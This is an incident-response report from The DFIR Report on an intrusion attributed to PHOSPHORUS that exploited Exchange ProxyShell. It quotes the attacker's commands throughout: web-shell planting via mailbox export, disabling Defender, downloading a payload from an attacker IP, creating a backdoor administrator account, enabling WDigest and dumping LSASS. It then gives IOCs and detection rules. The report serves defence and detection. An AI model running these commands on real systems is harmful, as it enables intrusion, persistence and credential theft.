.wrap --> </div><!-- .navigation-top --> <div class="clock"> <div id="time"></div> <div id="date">Friday, February 21, 2025</div> </div> </div><!-- #nav-sticker --> <nav class="secondary-navigation" role="navigation" aria-label="Secondary Navigation"> <div class="wrap"> <button class="secondary-menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="secondary-toggle-text">Menu</span> <span class="secondary-toggle-bar"></span> </button> <ul id="primary-menu" class="secondary-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21323"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21322"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31037"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35457"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32608"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38110"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21321"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21327"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21328"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21324"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> </ul> </div><!-- .wrap --> </nav><!-- .secondary-navigation --> </div><!-- .main-header-brand --> </div><!-- .main-header --> </header><!-- #masthead --> <div id="content" class="site-content"> <div class="site-content-cell"> <div class="wrap wrap-width"> <div id="primary" class="content-area"> <main id="main" class="site-main"> <article id="post-5981" class="post-5981 post type-post status-publish format-standard hentry category-exploit category-fast-reverse-proxy category-phosphorus category-proxyshell entry"> <div class="entry-content-holder"> <header class="entry-header"> <div class="entry-meta"> <span class="cat-links"> <a class="category-color-34" href="https://thedfirreport.com/category/exploit/">exploit</a> <a class="category-color-87" href="https://thedfirreport.com/category/fast-reverse-proxy/">Fast Reverse Proxy</a> <a class="category-color-104" href="https://thedfirreport.com/category/phosphorus/">PHOSPHORUS</a> <a class="category-color-88" href="https://thedfirreport.com/category/proxyshell/">ProxyShell</a> </span> </div><!-- .entry-meta --> <h1 class="entry-title">PHOSPHORUS Automates Initial Access Using ProxyShell</h1> <div class="entry-meta"> <span class="posted-on"><a href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" rel="bookmark"><time class="entry-date published" datetime="2022-03-21T01:55:06+00:00">March 21, 2022</time></a></span> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <p>In December 2021, we observed an adversary exploiting the <a href="https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell" target="_blank" rel="noreferrer noopener">Microsoft Exchange ProxyShell vulnerabilities</a> to gain initial access and execute code via multiple web shells. The overlap of activities and tasks was remarkably similar to that observed in our previous report, “<a href="https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" target="_blank" rel="noreferrer noopener">Exchange Exploit Leads to Domain Wide Ransomware</a>“.</p> <p>In this intrusion, we observed the initial exploitation of the ProxyShell vulnerabilities followed by some further post-exploitation activity, which included web shells, credential dumping, and specialized payloads. We assess that this activity was related to <a href="https://attack.mitre.org/groups/G0059/" target="_blank" rel="noopener">PHOSPHORUS</a> (aka UNC2448, NemesisKitten, and DEV-0270) due to the TTP’s mirroring previously reported activity that was <a href="https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/" target="_blank" rel="noreferrer noopener">attributed to the group</a>.</p> <h2 class="wp-block-heading">Case Summary</h2> <p>The threat actors activity occurred in two bursts within a 3 day time frame. As with our previous case, they started by uploading their web shell and disabling antivirus services.</p> <p>Soon after, they established two persistence methods. The first was through scheduled tasks, and the second, was via a newly created account. The account was then added to the “remote desktop users” and “local administrators users” groups. Like in the prior case involving ProxyShell, we observed a file masquerading as dllhost.exe that exhibited similarities to a proxy tool call <a href="https://github.com/fatedier/frp" target="_blank" rel="noreferrer noopener">Fast Reverse Proxy</a> (with modifications) downloaded from the same IP as observed in the prior case and connecting to suspect domains.</p> <p>After establishing alternative ways of re-entering the targeted host, they enumerated the environment using Windows native programs such as net and ipconfig. At the end of their first visit, they disabled LSA protection, enabled WDigest for access to plain text credentials later, dumped the LSASS process memory, and downloaded the results via the web shell. </p> <p>All of this activity occurred over a time frame of around 2 minutes, leading us to assess that the entire attack was likely scripted out. The user agent strings of python-requests/2.26.0 and python-urllib3/1.26.7 also point to the use of scripts.</p> <p>Two days later, we saw the threat actors reappear. We expected them to pick up where they left off, however, they repeated all previous actions. Due to the similarity between the commands and the sequential order they ran, this is additional evidence the threat actors employed automated scripts to execute these activities.</p> <p>No further activity was observed as the threat actors were evicted from the network.</p> <h3 class="wp-block-heading">Services</h3> <p>We offer multiple services including a <a href="https://thedfirreport.com/services/" target="_blank" rel="noreferrer noopener">Threat Feed service</a> which tracks Command and Control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found <a href="https://thedfirreport.com/services/" target="_blank" rel="noreferrer noopener">here</a>.</p> <p>We also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our <a href="https://www.patreon.com/thedfirreport" target="_blank" rel="noreferrer noopener">Security Researcher and Organization</a> services.</p> <h2 class="wp-block-heading">Timeline</h2> <p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-6005" src="https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell.png" alt="" width="1080" height="1402" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell.png 1080w, https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell-231x300.png 231w, https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell-789x1024.png 789w, https://thedfirreport.com/wp-content/uploads/2022/03/APT35-Automates-Initial-Access-Using-ProxyShell-768x997.png 768w" sizes="(max-width: 1080px) 100vw, 1080px" /></p> <p>Analysis and reporting completed by <a href="https://twitter.com/samaritan_o" target="_blank" rel="noreferrer noopener">@samaritan_o</a>, <a href="https://twitter.com/Kostastsale" target="_blank" rel="noreferrer noopener">@kostastsale</a>, <a href="https://twitter.com/svch0st" target="_blank" rel="noreferrer noopener">@svch0st</a> and <a href="https://twitter.com/RoxpinTeddy" target="_blank" rel="noreferrer noopener">@RoxpinTeddy</a>.</p> <h2 class="wp-block-heading">Initial Access</h2> <p>As similarly seen in our previous report <a href="https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/" target="_blank" rel="noreferrer noopener">Exchange Exploit Leads to Domain Wide Ransomware</a>, this threat actor utilized the Microsoft Exchange ProxyShell vulnerabilities; an exploit chain of 3 different CVEs:</p> <ul class="wp-block-list"> <li>CVE-2021-34473</li> <li>CVE-2021-34523</li> <li>CVE-2021-31207</li> </ul> <p>With the appropriate <a href="https://www.mandiant.com/resources/greater-visibilityt" target="_blank" rel="noreferrer noopener">PowerShell logging</a> available we were able to recover the PowerShell commandlets executed on the Exchange server, which resulted in the creation of web shells on the host.</p> <p>Once the threat actor had gained a valid privileged session using CVE-2021-34473 and CVE-2021-34523, they then ensured the default Administrator account had the correct role for mailbox importing and exporting:</p> <pre class="wp-block-preformatted">New-ManagementRoleAssignment -Role "Mailbox Import Export" -User "administrator@<REDACTED>"</pre> <p>The threat actor initiated a mailbox export that matched the search criteria of <code>Subject -eq 'aspx_wkggiyvttmu'</code> to a provided location with the .aspx extension. While the file created is a legitimate .pst file, in it contains plaintext web shell code that is rendered by IIS when requested.</p> <pre class="wp-block-preformatted">New-MailboxExportRequest -Mailbox "administrator@<REDACTED>" -FilePath "\\localhost\C$\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\aspx_wkggiyvttmu.aspx" -IncludeFolders ("#Drafts#") -ContentFilter "Subject -eq 'aspx_wkggiyvttmu'" </pre> <p>In an attempt to hide the actions taken, the actor removes the request just created:</p> <pre class="wp-block-preformatted">Remove-MailboxExportRequest -Confirm "False" -Force "True" -Identity "77a883a7-470c-471c-a193-f4c54f263fde"</pre> <p>This activity then repeated approximately 2 days after the initial exploitation. As the actor had already achieved remote execution by this point, there is a high likelihood the exploitation of Exchange servers is automated. Below is the second web shell created that shares the same naming convention as the first.</p> <pre class="wp-block-preformatted">New-MailboxExportRequest -Mailbox "administrator@<REDACTED>" -FilePath "\\localhost\c$\inetpub\wwwroot\aspnet_client\system_web\aspx_dyukbdcxjfi.aspx" -IncludeFolders ("#Drafts#") -ContentFilter "Subject -eq 'aspx_dyukbdcxjfi'"</pre> <h2 class="wp-block-heading"><img decoding="async" class="alignnone size-full wp-image-6007" src="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png" alt="" width="1673" height="1447" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png 1673w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-300x259.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-1024x886.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-768x664.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain-1536x1329.png 1536w" sizes="(max-width: 1673px) 100vw, 1673px" /></h2> <h2>Execution</h2> <p>Approximately 20 seconds after the web shell <code>aspx_wkggiyvttmu.aspx</code> was created, a flurry of POST requests were sent to the web shell.</p> <p>The web shell followed a similar structure seen in previous cases. At least two parameters are sent in the POST request to the web shell, <code>delimiter</code> which defines what string is used to separate the response, and <code>exec_code</code> which is the command to be ran. The web shell had predefined functions for special actions:</p> <ul class="wp-block-list"> <li><code>get</code> – Get file from location on disk (additional <code>dst</code> POST parameter)</li> <li><code>put</code> – Upload file to location (additional <code>dst</code> POST parameter)</li> <li><code>run</code> – Execute a list of commands separated by “;” using PowerShell.</li> </ul> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-02.png"><img decoding="async" class="aligncenter size-full wp-image-5992" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-02.png" alt="" width="1497" height="819" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-02.png 1497w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-02-300x164.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-02-1024x560.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-02-768x420.png 768w" sizes="(max-width: 1497px) 100vw, 1497px" /></a></figure> <p>If <code>exec_code</code> does not start with one of the above commands, it will simply attempt to run it with PowerShell.</p> <p>The environment for this investigation had SSL inspection and PCAPs available for analysis which allowed us to see the commands being sent to the web shell itself. Below you can see an example of commands that were sent and the outputs they returned in the response.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-03.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5993" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-03.png" alt="" width="1600" height="503" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-03.png 1600w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-300x94.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-1024x322.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-768x241.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-03-1536x483.png 1536w" sizes="auto, (max-width: 1600px) 100vw, 1600px" /></a></figure> <p>The actor first uploaded a file <code>Wininet.xml</code>, which is later used to create a scheduled task, to <code>C:\windows\temp</code> using the <code>put</code> command of the web shell. This was followed shortly by several commands to impair Windows Defender before downloading and executing a fake <code>dllhost.exe</code> from 148.251.71[.]182.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-04.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5994" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-04.png" alt="" width="1871" height="83" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-04.png 1871w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-300x13.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-1024x45.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-768x34.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-04-1536x68.png 1536w" sizes="auto, (max-width: 1871px) 100vw, 1871px" /></a></figure> <p>Scheduled Task Commands:</p> <pre class="wp-block-preformatted">schtasks.exe /Create /F /XML C:\windows\temp\Wininet.xml /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <pre class="wp-block-preformatted">schtasks.exe /Run /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <p>Defender Modification Command:</p> <pre class="wp-block-preformatted">try {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -AsJob; Set-MpPreference -DisableRealtimeMonitoring 1 -AsJob; Add-MpPreference -ExclusionPath 'C:\Windows' -Force -AsJob} catch {}</pre> <pre class="wp-block-preformatted">Start-Process powershell.exe {$file='c:\windows\dllhost.exe'; Invoke-WebRequest -Uri 'hXXp://148.251.71[.]182/update[.]tmp' -OutFile $file} </pre> <p>The schedule task runs a batch script called <code>Wininet.bat</code> which was also uploaded through the web shell. <code>Wininet.bat</code> simply loops through the execution of the file <code>dllhost.exe</code>.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-05.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5995" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-05.png" alt="" width="381" height="120" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-05.png 381w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-05-300x94.png 300w" sizes="auto, (max-width: 381px) 100vw, 381px" /></a></figure> <p>The file <code>dllhost.exe</code> is a golang binary. When executed, the binary was observed resolving the following domains:</p> <ul class="wp-block-list"> <li>api.myip[.]com (for discovery)</li> <li>tcp443.msupdate[.]us</li> <li>kcp53.msupdate[.]us</li> </ul> <p>The binary also spawns the following commands when executed:</p> <ul class="wp-block-list"> <li>cmd /c wmic computersystem get domain</li> <li>powershell /c Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders</li> </ul> <p>The <a href="https://www.virustotal.com/gui/file/1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e/community" target="_blank" rel="noreferrer noopener">binary</a> has a low confidence reference to FRP (<a href="https://github.com/fatedier/frp" target="_blank" rel="noreferrer noopener">FastReverseProxy</a>) as the sample matches the closed source Yara rule – <a href="https://valhalla.nextron-systems.com/info/rule/HKTL_PUA_FRP_FastReverseProxy_Oct21_1" target="_blank" rel="noreferrer noopener">HKTL_PUA_FRP_FastReverseProxy_Oct21_1</a> (by Florian Roth) however it does not behave in the same way as the open source tool. This file also matches on an additional Yara rule more recently – <a href="https://valhalla.nextron-systems.com/info/rule/APT_MAL_Go_FRP_CharmingKitten_Jan22_1" target="_blank" rel="noreferrer noopener">APT_MAL_Go_FRP_CharmingKitten_Jan22_1</a> pointing to the file including some code from FRP but otherwise having been modified for use by this threat actor.</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-6008" src="https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution.png" alt="" width="1427" height="511" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution.png 1427w, https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution-300x107.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution-1024x367.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/dllhost.exe-Execution-768x275.png 768w" sizes="auto, (max-width: 1427px) 100vw, 1427px" /></p> <h2 class="wp-block-heading">Persistence</h2> <p>The threat actor utilized both account creation and scheduled tasks to gain persistence in the environment.</p> <p><strong>New account creation</strong></p> <p>During the first activity, we observed the use of <code>user.exe</code> executable that ran the following PowerShell command:</p> <pre class="wp-block-preformatted">powershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount </pre> <p>The first thing they did was make a new user named <code>DefaultAccount</code> with the password <code>P@ssw0rd123412</code>. They then activated the account and changed the password (<code>P@ssw0rd12341234</code>) for the second time. Finally the commands added the new account to the Administrators group and Remote Desktop Users group.</p> <p>The threat actors ran the same command again two days later:</p> <pre class="wp-block-preformatted">powershell.exe /c net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount </pre> <p>Due to the close proximity between executed commands, we assess that the threat actors used tools to automate the execution and discovery phases of this attack.</p> <p><strong>Scheduled task</strong></p> <p>As previously noted, we discovered the creation of a Scheduled task from a .xml template that was copied to the server via the web shell.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5996" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.png" alt="" width="646" height="382" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.png 646w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-06-300x177.png 300w" sizes="auto, (max-width: 646px) 100vw, 646px" /></a></figure> <p>Below, we can observe the content of <strong>wininet.xml</strong>:</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5998" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5.png" alt="" width="747" height="899" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5.png 747w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-06.5-249x300.png 249w" sizes="auto, (max-width: 747px) 100vw, 747px" /></a></figure> <p>The following commands where then ran to initiate the task and to achieve persistence:</p> <pre class="wp-block-preformatted">schtasks.exe /Create /F /XML %wintmp%\Wininet.xml /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <pre class="wp-block-preformatted">schtasks.exe /Run /tn '\Microsoft\Windows\Maintenance\Wininet'</pre> <h2 class="wp-block-heading">Privilege Escalation</h2> <p>The scheduled task created by the web shell was set to use the principal SID “S-1-5-18”, or SYSTEM.</p> <pre class="wp-block-preformatted"><UserId>S-1-5-18</UserId></pre> <h2>Defense Evasion</h2> <p>Using PowerShell the threat actors issued several commands to impair Windows Defender including:</p> <ul class="wp-block-list"> <li>Windows Defender Behavior Monitoring was disabled.</li> <li>The Severe Threat default action was set to ‘Allow’.</li> <li>Realtime Monitoring was disabled.</li> <li>The ‘C:\Windows’ path was excluded from scheduled and real-time scanning.</li> </ul> <pre class="wp-block-preformatted">try {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -AsJob; Set-MpPreference -DisableRealtimeMonitoring 1 -AsJob; Add-MpPreference -ExclusionPath 'C:\Windows' -Force -AsJob} catch {}</pre> <p>A rule was added to the Windows Firewall to allow remote RDP traffic.</p> <pre class="wp-block-preformatted">"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389</pre> <p>Remote Desktop Services was started.</p> <pre class="wp-block-preformatted">"net" start TermService</pre> <p>The threat actor enabled WDigest authentication. This enforces the storage of credentials in plaintext on future logins.</p> <pre class="wp-block-preformatted">"reg" add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</pre> <p>LSA protection was disabled.</p> <pre class="wp-block-preformatted">"reg" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f</pre> <h2 class="wp-block-heading">Credential Access</h2> <p>The threat actor created a process memory dump from LSASS.exe. In this case they created a “minidump” using the LOLBIN <a href="https://lolbas-project.github.io/lolbas/Libraries/comsvcs/" target="_blank" rel="noreferrer noopener">comsvcs.dll</a>. This was dropped to disk as ssasl.pmd (lsass.dmp reversed) and then zipped before exfiltration.</p> <pre class="wp-block-preformatted">"powershell.exe" /c Remove-Item -Path C:\windows\temp\ssasl.pmd -Force -ErrorAction Ignore; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id C:\windows\temp\ssasl.pmd full | out-host; Compress-Archive C:\windows\temp\ssasl.pmd C:\windows\temp\ssasl.zip</pre> <h2 class="wp-block-heading"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-6003" src="https://thedfirreport.com/wp-content/uploads/2022/03/1.png" alt="" width="932" height="227" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/1.png 932w, https://thedfirreport.com/wp-content/uploads/2022/03/1-300x73.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/1-768x187.png 768w" sizes="auto, (max-width: 932px) 100vw, 932px" /></h2> <h2>Discovery</h2> <p>The threat actors used native Windows binaries to enumerate the exploited server in an automated fashion. They executed commands such as:</p> <pre class="wp-block-preformatted">net.exe user</pre> <pre class="wp-block-preformatted">ipconfig.exe /all</pre> <pre class="wp-block-preformatted">powershell.exe (multiple commands)</pre> <pre class="wp-block-preformatted">quser.exe</pre> <p>These discovery tasks like the rest of the activity observed from this threat actor was executed via the web shell.</p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-07.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5997" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-07.png" alt="" width="1682" height="302" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-07.png 1682w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-300x54.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-1024x184.png 1024w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-768x138.png 768w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-07-1536x276.png 1536w" sizes="auto, (max-width: 1682px) 100vw, 1682px" /></a></figure> <p>They used the PowerShell module Get-WmiObject to collect the name and IP address of the domain controller.</p> <pre class="wp-block-preformatted">Get-WMIObject Win32_NTDomain | findstr DomainController</pre> <p>Additionally, we saw threat actors retrieving an email address from the compromised exchange server using the below command. This was likely done as a test. </p> <pre class="wp-block-preformatted">Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"</pre> <h2 class="wp-block-heading">Collection</h2> <p>While having access to the Exchange server, we observed no attempts to export or access user mailboxes.</p> <h2 class="wp-block-heading">Command and Control</h2> <p>As we saw from the execution section,<code>dllhost.exe</code> was used to access the below domains for C2, which we believe was using a variation of FRP.</p> <ul> <li>tcp443.msupdate[.]us (107.173.231[.]114)</li> <li>kcp53.msupdate[.]us </li> <li>(107.173.231[.]114)</li> </ul> <p>This C2 channel was not used very much as most activity was done through the web shell.</p> <h2 class="wp-block-heading">Exfiltration</h2> <p>The only successful data that was exfiltrated from the environment was the archive containing the LSASS dump.</p> <p>Here you can see the threat actor using the web shell command to extract it: </p> <figure class="wp-block-image"><a href="https://thedfirreport.com/wp-content/uploads/2022/03/9893-09.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-6000" src="https://thedfirreport.com/wp-content/uploads/2022/03/9893-09.png" alt="" width="909" height="572" srcset="https://thedfirreport.com/wp-content/uploads/2022/03/9893-09.png 909w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-09-300x189.png 300w, https://thedfirreport.com/wp-content/uploads/2022/03/9893-09-768x483.png 768w" sizes="auto, (max-width: 909px) 100vw, 909px" /></a></figure> <h2 class="wp-block-heading">Impact</h2> <p>In this case, there was no further impact to the environment before the threat actors were evicted. <span style="color: #000000;">Due to our previous report and OSINT research we believe</span> with medium to high confidence that this intrusion would have ended in ransomware.</p> <h2 class="wp-block-heading"><strong>Indicators</strong></h2> <p>All artifacts including web shells, files, IPs, etc. were added to our <a href="https://thedfirreport.com/services/" target="_blank" rel="noreferrer noopener">services</a> in December.</p> <h3 class="wp-block-heading">Network</h3> <pre>ipv4:148.251.71[.]182<br />ipv4:107.173.231[.]114<br />domain: tcp443.msupdate[.]us<br />domain: kcp53.msupdate[.]us<br />useragent:python-urllib3/1.26.7<br />useragent:python-requests/2.26.0</pre> <h3 class="wp-block-heading">File</h3> <pre>aspx_dyukbdcxjfi.aspx<br />1a5ad24a6880eea807078375d6461f58<br />da2470c3990ea0862a79149c6036388498da83cd<br />84f77fc4281ebf94ab4897a48aa5dd7092cc0b7c78235965637eeef0908fb6c7<br /><br />dhvqx.aspx<br />b2fde6dc7bd1e04ce601f57805de415b<br />4d243969b54b9b80c1d26e0801a6e7e46d2ef03e<br />c5aae30675cc1fd83fd25330cec245af744b878a8f86626d98b8e7fcd3e970f8<br /><br />dllhost.exe<br />9a3703f9c532ae2ec3025840fa449d4e<br />8ece87086e8b5aba0d1cc4ec3804bf74e0b45bee<br />1604e69d17c0f26182a3e3ff65694a49450aafd56a7e8b21697a932409dfd81e<br /><br />wininet.bat<br />5f098b55f94f5a448ca28904a57c0e58<br />27102b416ef5df186bd8b35190c2a4cc4e2fbf37<br />668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0<br /><br />wininet.xml<br />d2f4647a3749d30a35d5a8faff41765e<br />0f676bc786db3c44cac4d2d22070fb514b4cb64c<br />559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e<br /><br />user.exe<br />f0be699c8aafc41b25a8fc0974cc4582<br />6bae2d45bbd8c4b0a59ba08892692fe86e596154<br />7b5fbbd90eab5bee6f3c25aa3c2762104e219f96501ad6a4463e25e6001eb00b<br /><br />task_update.exe<br />cacb64bdf648444e66c82f5ce61caf4b<br />3a6431169073d61748829c31a9da29123dd61da8<br />12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075f</pre> <h2 class="wp-block-heading">Detections</h2> <h3>Network</h3> <pre>ET INFO User-Agent (python-requests) Inbound to Webserver<br />ET INFO Generic HTTP EXE Upload Inbound<br />ET INFO Generic HTTP EXE Upload Outbound<br />GPL ATTACK_RESPONSE command completed<br />ET ATTACK_RESPONSE Net User Command Response<br />ET WEB_SERVER WebShell Generic - netsh firewall</pre> <h3 class="wp-block-heading">Sigma</h3> <p>Custom rules</p> <p>Exchange Webshell creation – <a href="https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/exchange_webshell_creation" target="_blank" rel="noopener">https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/exchange_webshell_creation</a></p> <p>DefaultAccount Usage – <a href="https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/defaultaccount_usage" target="_blank" rel="noopener">https://github.com/The-DFIR-Report/Sigma-Rules/blob/main/defaultaccount_usage</a></p> <p>SigmaHQ rules</p> <p>Local Accounts Discovery – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_local_system_owner_account_discovery.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_local_system_owner_account_discovery.yml</a></p> <p>Lsass Memory Dump via Comsvcs DLL – <a href="https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_dll.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_dump_comsvcs_dll.yml</a></p> <p>Net.exe Execution – <a href="https://github.com/SigmaHQ/sigma/blob/777d218adc789b7f1b146701793e78799324d87d/rules/windows/process_creation/win_susp_net_execution.yml" target="_blank" rel="noreferrer noopener">https://github.com/SigmaHQ/sigma/blob/777d218adc789b7f1b146701793e78799324d87d/rules/windows/process_creation/win_susp_net_execution.yml</a></p> <p>Net-exe User Account Creation – <a href="https://github.com/SigmaHQ/sigma/blob/ab814cbc408234eddf538bc893fcbe00c32ca2e9/rules/windows/process_creation/win_net_user_add.yml" target="_blank" rel="noreferrer 